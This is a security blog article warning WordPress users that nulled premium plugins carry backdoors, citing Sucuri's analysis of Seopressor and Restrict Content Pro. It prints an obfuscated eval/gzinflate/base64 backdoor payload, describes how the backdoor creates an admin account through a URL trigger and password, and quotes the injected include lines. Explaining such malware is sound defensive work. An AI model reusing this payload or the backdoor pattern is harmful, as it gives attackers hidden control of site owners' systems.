<h1>The risk of using free and nulled premium plugins</h1>

<p>Published 2014-12-26, https://affinite.io/cs/riziko-pri-pouziti-free-a-nulled-premium-pluginu/</p>

<p>Although there are many free plugins for WordPress, premium plugins often offer functionality that the free ones lack. And you have surely come across sites where they can be downloaded for free.</p>

<p>Such sites offer them under the label "nulled", meaning the license check or protection has been removed. Just type "&lt;plugin name&gt; free download" into Google and you will find a whole range of sites where you can download them. This article, however, is not meant to be a guide to finding such sites, quite the opposite.</p>

<p>Of course, getting something valuable for free can be tempting, but at the same time you have to ask yourself why the owners of these sites offer the plugins so "selflessly".</p>

<p>The answer is simple: their motivation is profit. By installing a theme or plugin that was essentially stolen, you often add an unwelcome backdoor to your site, and an unauthorized person gets into your system.</p>

<p>We will look at several cases that the company Sucuri published on its blog in the article "Unmasking free premium WordPress plugin".</p>

<h2>Seopressor</h2>

<p>This plugin can be bought for 47 dollars, i.e. roughly 500 Czech crowns. When the source files were inspected, the following code was found in the file central.class.php.</p>

<pre>eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/
iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/
5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) );
</pre>

<p>Personally, if I come across code like this in a plugin and the plugin is not essential for me, I remove it immediately. I don't even investigate what the encoded part contains, given that I can never be sure what it contains. Even if it were harmless code that the developer encoded so that nobody copies his work, it is out of luck with me. Plugins with a similarly encoded part should not appear in the official repository.</p>

<p>But back to the code that was found. When Sucuri decoded it, these two functions appeared:</p>

<p>The first creates a WordPress user with administrator rights if you call a URL that ends with "?cms=jjoplmh". The second function checks whether the WordPress user exists and, if not, sends information about the site to the email thomasza@gmx.com.</p>

<p>Both functions are hooked into the wp_head hook. <strong>Summary</strong>: you download a nulled plugin; after installation, the function sends the URL of your site to the email thomasza@gmx.com; the attacker enters www.vasweb.cz/?cms=jjoplmh into the browser and thereby creates a WordPress user with the password gh67io9Cjm and administrator rights.</p>

<h2>Restrict Content Pro</h2>

<p>In this plugin, the file sidebar.php was first found in the includes folder. Its size was 72,847 bytes and the code looked like commented-out forms for the plugin's options.</p>

<p>If you go through the code (link), somewhere in the middle you will find an uncommented piece of code that looks similar to the previous example:</p>

<p>The attacker is trying to prevent detection of the encoded string by some tool, and at the same time trying to make the code get overlooked during a visual inspection. Nevertheless, it contains an encoded part which, once decoded, gives us the email wordpressslog@yandex.com. The function, as in the previous case, sends an email with information about the site's URL. With that, everything is connected and your site can easily be taken over and exploited.</p>

<p>Now we are still missing the second function, the one that creates a user with admin rights. It was found in the file class.php, masked in the same way. Because on their own these functions are harmless, the attacker modified the plugin's main file, adding to the code:</p>

<pre>include'includes/class.php'; include'includes/sidebar.php';</pre>

<p>It can be said that this problem does not arise if you do not use "stolen" plugins or themes. Unfortunately, the risks are often underestimated, or the site looks so trustworthy that it confuses an inexperienced user. So if you suspect malicious code on your site, use one of the plugins from this article: 5 plugins for detecting malware in WordPress.</p>